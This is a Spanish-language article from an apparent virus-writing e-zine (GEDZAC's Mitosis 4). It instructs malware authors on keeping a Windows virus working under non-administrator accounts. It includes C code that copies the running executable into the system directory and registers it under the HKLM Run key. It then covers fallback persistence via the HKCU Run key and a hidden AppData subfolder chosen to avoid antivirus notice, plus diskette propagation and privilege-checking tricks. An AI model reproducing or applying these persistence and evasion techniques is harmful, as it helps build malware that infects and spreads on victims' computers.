<html>
<head>
<META http-equiv=Content-Type content="text/html; charset=ISO-8859-1"><style type="text/css">
<!--
body,td,th {
	color: #FFFFFF;
}
body {
	background-color: #000000;
	SCROLLBAR-FACE-COLOR: #000000; 
	SCROLLBAR-HIGHLIGHT-COLOR: #0066cc; 
	SCROLLBAR-SHADOW-COLOR: #0066cc; 
	SCROLLBAR-3DLIGHT-COLOR: #000000; 
	SCROLLBAR-ARROW-COLOR: #0066cc; 
	SCROLLBAR-TRACK-COLOR: #000000; 
	SCROLLBAR-DARKSHADOW-COLOR: #000000

}
.style55 {font-family: "Courier New", Courier, monospace; font-size: 12px; }
.style62 {
	font-family: "Courier New", Courier, monospace;
	font-size: 14px;
	color: #0066CC;
	font-weight: bold;
	font-style: italic;
}
.style66 {color: #CCCCCC}
.Estilo4 {font-size: 14px; color: #FFFFFF; }
.Estilo5 {font-size: 18px; color: #FFFFFF; font-weight: bold; }
.Estilo6 {font-size: 14px; color: #00FF00; font-weight: bold; }
.Estilo8 {color: #0066FF}
.Estilo16 {font-size: 14px; color: #FFFFFF; font-weight: bold; }
.style145 {color: #FF0000}
.style146 {color: #999999}
.style148 {color: #00FF00}


-->

</style>
</head>

<body>

  <div align="left">
<p><span class="style55"><img src="../0x01.png" width="585" height="107"><bR>
      <span class="style66">#Infeccion cuando no tenemos privilegios</span></span><span class="style55"><br>
      #Autor: <strong>Machine_Dramon</strong></span><br>
    </p>
</div>
<div align="left" class="style55">
    <p align="justify">Este articulo es aplicable a los sistemas Windows de la familia NT (NT, XP, 2K), 
    en los Windows 9x el concepto de permisos de usuarios no impide una infeccion. Aunque aun hay muchos usuarios que manejan su Windows usando la cuenta de 
      Administrador, que se crea por defecto al instalar el sistema, cada vez son mas 
      los suarios, en especial empresas y organizaciones que se van dando cuenta que 
  para muchos trabajos en Windows, una cuenta de Usuario es suficiente. Un Virus que se ejecuta sobre una cuenta de usuario no podra hacer las mismas 
      cosas, que si se ejecutara sobre una cuenta con permisos de administrador. Aun asi, el Virus no debe fallar completamente al infectar el sistema, aunque no 
      pueda ejercer todas sus funciones, debe tratar de ser capaz de propagarse. </p>
    <p align="justify">Por ejemplo si el Virus se instalaba como servicio y se ejecuta en una cuenta 
      que no lo permite, pudiera tratar de instalarse realizando una entrada en la 
  parte run del registro en HKEY_CURRENT_USER. Si el virus necesita hacer un scaneo ICMP Ping, y se ejecuta en una cuenta en la 
      cual no tiene acceso a los Sockets Raw, pudiera usar las funciones 
  IcmpCreateFile, IcmpSendEcho y IcmpCloseHandle de icmp.dll Si se ejecuta sobre una cuenta casi sin permisos como la cuenta de Invitado, una 
      opcion es hacer una propagacion basica, como una propagacion por disckets. Lo importante es probar el codigo en diferentes cuentas, con distintos 
      privilegios, como cuentas del grupo Administradores, Usuarios Avanzados, 
      Usuarios e Invitados, para observar como se desenvuelve el codigo en cada uno de 
  estos escenarios. </p>
    <p align="justify">Por ejemplo este codigo, que realiza 2 acciones comunes, crear una entrada en la 
      parte run del registro de HKEY_LOCAL_MACHINE y copiarse al directorio %System% </p>
    <p> <br>
      <span class="style146">#include <br>
      //-----------------------------------------------------------------------------------------------<br>
      int WINAPI WinMain(HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR lpszArgument, int nFunsterStil)<br>
      {<br>
      bool b;<br>
      char mypath[MAX_PATH], syspath[MAX_PATH], cpypath[MAX_PATH];<br>
      HKEY hKey;<br>
      LONG x;</span></p>
    <p class="style146"> GetSystemDirectory(syspath, MAX_PATH);</p>
    <p class="style146"> GetModuleFileName(NULL, mypath, MAX_PATH);</p>
    <p class="style146"> lstrcat(lstrcpy(cpypath, syspath), &quot;\\copia.exe&quot;);</p>
    <p class="style146"> x = RegCreateKey(HKEY_LOCAL_MACHINE, &quot;Software\\Microsoft\\Windows\\CurrentVersion\\Run&quot;, &amp;hKey);</p>
    <p class="style146"> if(x==ERROR_SUCCESS)<br>
      {<br>
      x = RegSetValueEx(hKey, &quot;Copia&quot;, 0, REG_SZ, (LPBYTE)&amp;cpypath, lstrlen(cpypath)+1);</p>
    <p class="style146"> if(x==ERROR_SUCCESS) MessageBox(0, &quot;Valor de Registro Creado&quot;, &quot;OK&quot;, 0);</p>
    <p class="style146"> RegCloseKey(hKey);<br>
      }</p>
    <p class="style146"> //==============================================================================</p>
    <p class="style146"> b = CopyFile(mypath, cpypath, true);</p>
    <p class="style146"> if(b)<br>
      {<br>
      MessageBox(0, &quot;Archivo Copiado&quot;, &quot;OK&quot;, 0);<br>
      }</p>
    <p class="style146"> //==============================================================================</p>
  <p align="justify"><span class="style146"> return 0;<br>
      }</span><br>
      <br>
    En una cuenta de administrador el codigo funciona bien, pero en una cuenta de 
    usuario tanto RegSetValuEx como CopyFile, fallan con un error de acceso denegado 
    (ERROR_ACCESS_DENIED = 5), en el caso de CopyFile hay que llamar a GetLastError 
    para obtener el codigo de error. En el caso del error en RegSetValueEx, se da porque una cuenta de usuario no 
      tiene los permisos para escribir en la rama del registro que estamos indicando, 
      una solucion seria cambiar HKEY_LOCAL_MACHINE por HKEY_CURRENT_USER, que no es 
      lo mismo porque en el primer caso el virus se ejecutaria en el inicio del
      sistema sea cual fuere el usuario que inicie sesion, en el segundo caso solo se 
      ejecutaria cuando inicie sesion el usuario infectado, ya que HKEY_CURRENT_USER 
      pertenece al usuario actual. </p>
    <p align="justify">En el caso del error en CopyFile, se da porque una cuenta de usuario no tiene 
      los permisos para copiar archivos en el directorio %System%, una solucion seria 
      copiarnos al directorio de &quot;Datos de Programa&quot; del usuario, el cual se encuentra 
      en Documents and Settings\%Usuario% esto no presenta ninguna desventaja, porque 
      da lo mismo desde donde nos ejecutemos, sea de %System% o de otro lugar y hasta 
      es preferible, porque llamar a GetSystemDirectory o GetWindowsDirectory ya es 
      conocido por los usuarios y mas aun por los Antivirus, ademas de que al 
  pertenecer este directorio al usuario actual no habra problemas de permisos. </p>
  <p align="justify">Podemos obtener la ruta del directorio de &quot;Datos de Programa&quot;, mediante este 
      codigo: <br>
      <br>
      <span class="style146">.......</span></p>
    <p class="style146">char personal_path[MAX_PATH];<br>
        <br>
      SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, personal_path);</p>
    <p class="style146">PathAppend(personal_path, &quot;VxApplication&quot;);</p>
    <p class="style146">if(CreateDirectory(personal_path, 0))<br>
      {<br>
      PathAppend(personal_path, &quot;copia.exe&quot;);</p>
    <p class="style146"> CopyFile(mypath, personal_path, true);<br>
      }</p>
  <p align="justify"><span class="style146">.......</span><br>
        <br>
    Luego de obtener el path de ese directorio, creamos una subcarpeta y dentro de 
    ella copiamos el Virus. Para la constante CSIDL_APPDATA hay que incluir shlobj.h y para la funcion 
      PathAppend shlwapi.h y shlwapi.lib (&oacute; libshlwapi.a), aunque PathAppend pudiera 
      sustituirse por unas llamadas a lstrcat, porque solo es para construir el path 
      de la subcarpeta y luego el del archivo donde se copiara el Virus. </p>
    <p align="justify">Entonces el Virus puede darse cuenta que no cuenta con los permisos necesarios 
      para realizar alguna accion, luego de que las funciones fallen y observando los 
      codigos de error resultantes, pero aunque pudiera funcionar, no es la mejor 
  forma. Otra opcion es que el Virus pueda identificar a que grupo pertenece la cuenta de 
      usuario sobre la que se esta ejecutando, y en el caso de los grupos m&aacute;s comunes: <br>
      Administradores, Usuarios Avanzados, Usuarios e Invitados, sobre los cuales 
      podemos probar el Virus, entonces ya sabremos si el grupo al que pertenece la 
      cuenta de usuario tiene los permisos necesarios para que el Virus ejecute 
      determinadas acciones (a menos que se hayan cambiado los permisos predefinidos 
  del grupo). </p>
    <p align="justify">En el caso de una cuenta que no pertenesca a ningun grupo predefinido (ademas de 
      los mencionados hay otros grupos predefinidos que se crean en la instalacion de 
      Windows, podemos verlos en &quot;Administracion de Equipos&quot; escribiendo      &quot;<em>compmgmt.msc</em>&quot; en Ejecutar), se podria identificar exactamente el privilegio o 
      permiso necesario para ejecutar la accion y ver si lo tiene la cuenta de usuario 
  o el grupo al que pertenece la cuenta sobre la que nos estamos ejecutando. Y aunque el usuario o el grupo al que pertenece el usuario tengan el privilegio 
      es posible que el token (testigo) asociado al proceso o al hilo no tenga el privilegio habilitado, como en el caso de SeShutdownPrivilege, que no se 
  habilita en forma predeterminada para un proceso y debe ser habilitado. </p>
    <p align="justify">Como ejemplo en el .Zip del articulo se pueden encontrar algunos codigos que 
      pueden servir para verificar con que permisos se ejecuta el proceso del Virus:<br>
      &middot;Un codigo para listar los privilegios concedidos a una cuenta de usuario o grupo 
      en <span class="style148">list_privileges.cpp 
      </span><br>
    &middot;Dos codigos para obtener el nombre de cuenta y el identificador de seguridad 
      (SID) del usuario que ejecuta el proceso en <span class="style148">getuser1.cpp</span> y <span class="style148">getuser2.cpp</span>    <br>
    &middot;Un codigo para obtener el nombre del(de los) grupo(s) a el(los) que pertenece la 
      cuenta de usuario sobre la cual se ejecuta el proceso en <span class="style148">list_process_groups.cpp 
      </span><br>
    &middot;Un codigo para listar los grupos locales en el sistema y los usuarios que
      pertenecen a estos grupos en <span class="style148">list_groups_users.cpp
      </span><br>
    &middot;Un codigo para listar los privilegios habilitados y desabilitados en el proceso 
      en <span class="style148">list_process_privileges.cpp 
      </span><br>
    &middot;Un codigo para verificar si un determinado privilegio se encuentra habilitado en
      el proceso en <span class="style148">check_privilege.cpp</span>    <br>
    &middot;Un codigo para habilitar un privilegio en el proceso en <span class="style148">add_privilege.cpp</span>, si es
      que la cuenta de usuario o el grupo al que pertenece la cuenta, ya tiene el
      privilegio asignado, pero no esta habilitado en el proceso.
    <br>
    &middot;Dos codigos para verificar si la cuenta de usuario sobre la cual se ejecuta el
      proceso pertenece al grupo de Administradores en <span class="style148">isadmin1.cpp</span>, <span class="style148">isadmin2.cpp</span> y
      <span class="style148">isadmin3.cpp</span>    <br>Tres codigos para identificar a que grupo predefinido pertenece la cuenta de
      usuario sobre la cual se ejecuta el proceso en <span class="style148">looup_group1.cpp</span> y
      <span class="style148">looup_group2.cpp </span></p>
    <p align="justify">Los codigos fueron probados en <strong>Windows XP SP2, XP SP1 y 2003 Server</strong>. </p>
    <p align="justify"> <span class="style145">Nota:</span> Los permisos en lo que se refiere a directorios y archivos, solo funcionan con
      NTFS, si se usa FAT32 todos los usuarios tendran acceso a las carpetas,<br>
      independientemente de su tipo de cuenta.
      Agradecimiento a los amigos que me ayudaron a probar unos codigos para este 
      articulo en sus computadoras, porque yo tenia el sistema de archivos en FAT32 y 
  no me funcionaba como debieran los permisos sobre los directorios. </p>
    <p align="justify">&nbsp;</p>
  <p>&nbsp;</p>
    <p></p>
    <p align="justify"><br>
    </p>
    <p align="right" class="style62">(C) Mitosis 4 - GEDZAC LABS</p>
</div>
</body>
</html>
